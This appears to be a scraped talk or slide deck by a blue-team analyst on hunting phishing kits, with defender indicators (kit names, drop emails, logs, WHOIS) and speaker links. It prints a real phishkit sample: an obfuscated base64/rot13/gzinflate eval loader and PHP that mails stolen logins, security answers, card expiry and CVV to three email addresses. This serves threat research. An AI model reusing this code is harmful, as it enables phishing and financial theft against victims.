Blue Team
DFIR
Automate all the things
Open Sorcerer
I like long walks through binary trees, #Python & #PowerShell riding, holding hands with Microsoft, writing romantic experiences about code, git prune all the branches, and deep sea #phishing
eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));
$user = $_SESSION['username'];
$pass = $_SESSION['password'];
$q1= $_SESSION['question1'];
$a1 = $_SESSION['answer1'];
$q2 = $_SESSION['question2'];
$a2 = $_SESSION['answer2'];
$q3 = $_SESSION['question3'];
$a3 = $_SESSION['answer3'];
$dob = $_SESSION['dob'];
$exp = $_SESSION['exp'];
$cvv = $_SESSION['cvv'];
if (getenv('HTTP_CLIENT_IP')){
$ip=getenv('HTTP_CLIENT_IP');}
else {
$ip=getenv('REMOTE_ADDR');}
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$browser = $_SERVER['HTTP_USER_AGENT'];
$data = "---------------------bmr---------------------
User: $user
Pass: $pass
-
Q1 : $q1
A1 : $a1
Q2 : $q2
A2 : $a2
Q3 : $q3
A3 : $a3
dob: $dob
exp: $exp
cvv: $cvv
-
Browser: $browser
IP: $ip
---------------------BMO---------------------
";
$un = "multic62@yandex.com";
$do = "sco314159265395.com";
$tr = "fi5319624@gmail.com";
$subj = "Bmer $user#$pass#";
if ($_SESSION['username'] != "" ) {
mail($un,$subj,$data);
mail($do,$subj,$data);
mail($tr,$subj,$data);
}
https://media.pitchfork.com/photos/5d66f433ff912900082415fc/2:1/w_790/TeeJay6.png
reduce network communications with the original / cloned site
increase backwards compatibility
And typical confirmation pages for websites require specific images to replicate the users expected experience.
PhishKit Names & Versions
Email Addresses being used to forward captured content
Logs
Specific hosting providers
WHOIS/RDAP info
Additionally, if you continue to see a phishkit variant over and over you can track their defensive measures - this also helps to improve your own tooling
twitter: @MSAdministrator
github: https://github.com/MSAdministrator
p-blog: https://letsautomate.it
w-blog: https://swimlane.com/blog
trawl: https://github.com/swimlane/trawl
slides: https://letsautomate.it/presentations/hunting-for-phishkits.html#/
(slides will be up sometime this week/end)